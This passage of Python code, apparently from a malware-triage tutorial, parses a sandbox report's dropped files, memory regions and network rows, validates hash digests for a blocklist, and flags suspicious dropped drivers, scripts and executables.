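NET_RE = re.compile(r"^([A-Z]{2})\s+(\S+):(\d+)\s+(\S+)\s+(tcp|udp)$")
# Heuristic triage rules: the example's own, not the sandbox's signatures.
NOTABLE_EXT = {
    ".sys": "kernel driver dropped to disk; check whether the sample loads it",
    ".vbe": "encoded VBScript", ".bat": "batch script", ".ps1": "PowerShell script",
}


@dataclass
class DroppedFile:
    path: str
    hashes: dict = field(default_factory=dict)


@dataclass
class MemoryRegion:
    pid: int
    index: int
    start: int
    end: int


def parse_files(text):
    """Group each path with the digest lines that follow it; collect memory dumps separately."""
    files, regions, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MEM_RE.match(line)
        if m:
            regions.append(MemoryRegion(int(m[1]), int(m[2]), int(m[3], 16), int(m[4], 16)))
            current = None
            continue
        algo, _, digest = line.partition(" ")
        if algo in HASH_LEN and current is not None:
            # A digest of the wrong length is a copy/paste error, not an IOC; fail loudly.
            if not re.fullmatch(r"[0-9a-f]{%d}" % HASH_LEN[algo], digest.lower()):
                raise ValueError(f"malformed {algo} for {current.path}: {digest}")
            current.hashes[algo] = digest.lower()
        else:
            current = DroppedFile(line)
            files.append(current)
    return files, regions


def ptr_to_ip(name):
    """Turn a reverse-lookup name (d.c.b.a.in-addr.arpa) back into the IPv4 a.b.c.d it asks about."""
    suffix = ".in-addr.arpa"
    if not name.endswith(suffix):
        return None
    octets = name[: -len(suffix)].split(".")
    if len(octets) != 4:
        return None
    try:
        return str(ipaddress.IPv4Address(".".join(reversed(octets))))
    except ValueError:
        return None


def parse_network(text):
    """Split 'CC ip:port name proto' rows into dicts."""
    rows = []
    for raw in text.splitlines():
        m = NET_RE.match(raw.strip())
        if m:
            rows.append({"cc": m[1], "ip": m[2], "port": int(m[3]), "name": m[4], "proto": m[5]})
    return rows


def ptr_targets_contacted(rows):
    """IPs the sample both reverse-resolved over DNS and then connected to directly."""
    looked_up = {ptr_to_ip(r["name"]) for r in rows if r["port"] == 53} - {None}
    contacted = {r["ip"] for r in rows if r["port"] != 53}
    return sorted(looked_up & contacted)


def notable(files):
    """Flag drivers, scripts, and executables written under ProgramData or AppData."""
    out = []
    for f in files:
        name = f.path.rsplit("\\", 1)[-1]
        ext = name[name.rfind("."):].lower() if "." in name else ""
        low = f.path.lower()
        if ext in NOTABLE_EXT:
            out.append((f.path, NOTABLE_EXT[ext]))
        elif ext == ".exe" and (low.startswith("c:\\programdata\\") or "\\appdata\\" in low):
            out.append((f.path, "executable written to ProgramData/AppData, not Program Files"))
    return out
```

Run `parse_files` over the whole Files section and `parse_network` over the Network table to get a hash set for blocklisting and a list of destinations; `ptr_targets_contacted` is the quick check that separates a PTR lookup the sandbox made for display from one the sample itself made before connecting. Paste the listing in as-is: the parser raises on any digest whose length does not match its algorithm, which catches truncated copies before they reach a blocklist.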